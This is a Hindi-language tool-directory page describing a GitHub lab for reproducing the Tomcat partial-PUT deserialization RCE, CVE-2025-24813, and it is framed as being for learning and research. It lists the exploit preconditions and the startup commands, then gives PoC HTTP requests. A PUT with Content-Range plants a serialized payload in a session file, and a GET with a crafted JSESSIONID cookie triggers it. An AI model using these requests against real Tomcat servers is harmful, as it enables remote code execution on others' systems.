Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 डीसीरियलाइज़ेशन RCE वातावरण | Kitploit
उपकरण/GitHubGitHub/x1ongsec/cve-2025-24813
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 डीसीरियलाइज़ेशन RCE वातावरण

रिपॉजिटरी देखें
281 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

यह रिपॉजिटरी CVE-2025-24813 Tomcat नवीनतम RCE के पुनरुत्पादन के लिए वातावरण है।

केवल सीखने और अनुसंधान के लिए उपयोग करें!

उपयोग की शर्तें

  • एप्लिकेशन ने DefaultServlet लेखन सुविधा सक्षम की है, जो डिफ़ॉल्ट रूप से बंद है
  • एप्लिकेशन partial PUT अनुरोध का समर्थन करता है, जो दुर्भावनापूर्ण सीरियलाइज़्ड डेटा को सत्र फ़ाइलों में लिख सकता है, यह सुविधा डिफ़ॉल्ट रूप से चालू है
  • एप्लिकेशन Tomcat की फ़ाइल सत्र स्थायित्व का उपयोग करता है और डिफ़ॉल्ट सत्र भंडारण स्थान का उपयोग करता है, अतिरिक्त कॉन्फ़िगरेशन की आवश्यकता है
  • एप्लिकेशन में एक लाइब्रेरी शामिल है जिसमें डी-सीरियलाइज़ेशन भेद्यता है, जैसे कि क्लासपाथ पर commons-collections, यह शर्त व्यावसायिक कार्यान्वयन पर निर्भर करती है कि क्या डी-सीरियलाइज़ेशन शोषण श्रृंखला वाली लाइब्रेरी पर निर्भरता है

इस वातावरण में ऊपर उल्लिखित पुनरुत्पादन हेतु आवश्यक शर्तें सक्षम की गई हैं

tomcat प्रारंभ करें

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

पहुँचें: http://127.0.0.1:9001/

image

POC

एक दुर्भावनापूर्ण सीरियलाइज़्ड फ़ाइल उत्पन्न करें, निम्नलिखित पैकेट का उपयोग करके अपलोड करें, ध्यान दें कि Range का ब्लॉक मान Length के समान होना चाहिए, और वर्तमान फ़ाइल की लंबाई से अधिक होना चाहिए।

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

निम्नलिखित POC का उपयोग करके ट्रिगर करें:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image
image

संदर्भ: https://forum.butian.net/article/674

टूल डाउनलोड करें